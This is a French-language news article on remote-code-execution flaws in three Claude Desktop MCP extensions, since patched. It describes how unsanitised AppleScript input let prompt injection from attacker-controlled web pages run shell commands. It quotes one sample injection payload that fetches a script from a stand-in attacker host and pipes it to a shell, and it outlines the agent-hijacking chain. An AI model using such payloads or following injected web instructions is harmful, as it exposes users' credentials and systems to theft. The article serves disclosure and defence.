Les outils d’intelligence artificielle (IA) sont rapidement devenus indispensables aux environnements de travail modernes, aidant les utilisateurs dans des tâches allant de l’analyse de données à la rédaction créative.
Cependant, la découverte de vulnérabilités critiques dans des plateformes d’IA de confiance rappelle que même les systèmes les plus avancés ne sont pas à l’abri des failles traditionnelles de cybersécurité.
L’identification récente de vulnérabilités d’exécution de code à distance (RCE) dans les extensions officielles de Claude Desktop met en lumière un grave problème de sécurité dans les environnements intégrant l’IA.
Comment un simple prompt devient une brèche
Les chercheurs de Koi ont récemment découvert de graves vulnérabilités d’exécution de code à distance dans trois extensions officielles de Claude Desktop — celles pour Chrome, iMessage et Apple Notes.
Toutes présentaient la même faille fondamentale : une injection de commandes non assainie.
Cette vulnérabilité permettait à des attaquants d’exploiter Claude Desktop en manipulant simplement le contenu de la requête d’un utilisateur ou les données récupérées depuis un site web.
Concrètement, cela signifiait qu’une question en apparence anodine — par exemple « Où puis-je jouer au paddle à Brooklyn ? » — pouvait déclencher l’exécution de code arbitraire sur la machine de l’utilisateur.
Des données sensibles comme des clés SSH, des identifiants AWS ou des mots de passe enregistrés dans le navigateur pouvaient être dérobées sans téléchargement malveillant ni tentative d’hameçonnage.
Les vulnérabilités ont été classées comme présentant une gravité élevée (CVSS 8,9) par Anthropic, qui a depuis corrigé les problèmes.
Comprendre les extensions de Claude Desktop
Les extensions de Claude Desktop sont conçues comme des points de connexion modulaires — conditionnés sous forme de serveurs Model Context Protocol (MCP) — qui permettent à Claude d’interagir directement avec les applications locales.
Chaque extension est distribuée sous la forme d’un fichier .mcpb contenant à la fois le code du serveur MCP et un manifeste décrivant ses fonctionnalités. Elles fonctionnent conceptuellement comme les extensions Chrome, mais diffèrent dans leur implémentation.
Alors que les extensions Chrome s’exécutent dans le bac à sable de sécurité du navigateur, les extensions de Claude Desktop s’exécutent entièrement sans bac à sable sur la machine locale, avec tous les privilèges système.
Ce choix de conception permet une intégration poussée, mais introduit un risque. Les extensions peuvent lire et modifier des fichiers, exécuter des commandes système et accéder aux identifiants enregistrés.
Une vulnérabilité d’injection de commandes dans un tel environnement devient une voie directe vers la compromission complète du système.
La vulnérabilité
À l’origine de la vulnérabilité se trouvait un assainissement inadéquat des entrées. Chaque serveur MCP acceptait les données fournies par l’utilisateur et les transmettait directement à des commandes AppleScript, sans échappement ni validation.
Par exemple, lorsque Claude recevait l’instruction d’ouvrir cette URL dans Chrome, l’extension construisait une commande AppleScript telle que :
tell application “Google Chrome” to open location “${url}”
Si la valeur ${url} contenait une charge malveillante — telle que & do shell script “curl https://attacker.com/trojan | sh”& — elle exécutait des commandes shell arbitraires sur le système hôte.
De la question à la compromission
Le véritable danger venait de l’injection de prompt par l’intermédiaire de contenus web. Claude récupère et résume fréquemment des pages web pour répondre aux requêtes des utilisateurs.
Si l’une de ces pages est contrôlée par un attaquant — ou si une page légitime est compromise — son contenu peut être conçu de manière à inclure des instructions qui déclenchent la vulnérabilité.
Dans un tel scénario, un utilisateur peut poser une question simple à Claude, poussant le modèle à récupérer des données depuis un site web contrôlé par un attaquant.
Cette page, reconnaissant l’agent utilisateur de Claude, peut transmettre une charge utile dissimulée. Claude exécute alors sans le savoir la commande injectée par l’intermédiaire de l’extension vulnérable.
Résultat : des attaquants à distance obtiennent un accès au shell local avec tous les privilèges, ce qui leur permet de dérober des fichiers sensibles, d’installer des portes dérobées ou d’exfiltrer des identifiants — le tout sans que l’utilisateur remarque quoi que ce soit d’inhabituel.
Les risques cachés de l’intégration de l’IA
Même si ces vulnérabilités précises ont été corrigées, leur existence souligne un problème plus large lié aux écosystèmes émergents d’extensions d’IA.
Le modèle MCP permet aux développeurs de créer des extensions qui interagissent en profondeur avec les systèmes locaux.
Cependant, la combinaison du développement assisté par l’IA, d’un examen de sécurité limité et de l’absence de bac à sable pose des risques systémiques.
À mesure que les plateformes d’IA s’intègrent davantage aux systèmes d’exploitation et aux environnements d’entreprise, les développeurs doivent adopter des pratiques de sécurité rigoureuses, notamment un assainissement strict des entrées, une séparation des privilèges et un audit du code.
Les organisations devraient également appliquer des mesures de défense en profondeur, comme la surveillance de l’activité réseau sortante, l’application du principe du moindre privilège lors de l’exécution et l’isolement des outils d’IA vis-à-vis des identifiants sensibles.
Les vulnérabilités de Claude Desktop montrent que même des plateformes d’IA de confiance peuvent dissimuler de graves failles de sécurité aux conséquences bien réelles.
À mesure que l’écosystème de l’IA s’étend, il sera essentiel de garantir une intégration sécurisée entre les modèles d’IA et les systèmes locaux. La leçon n’est pas d’abandonner ces outils, mais de les utiliser avec discernement et prudence.





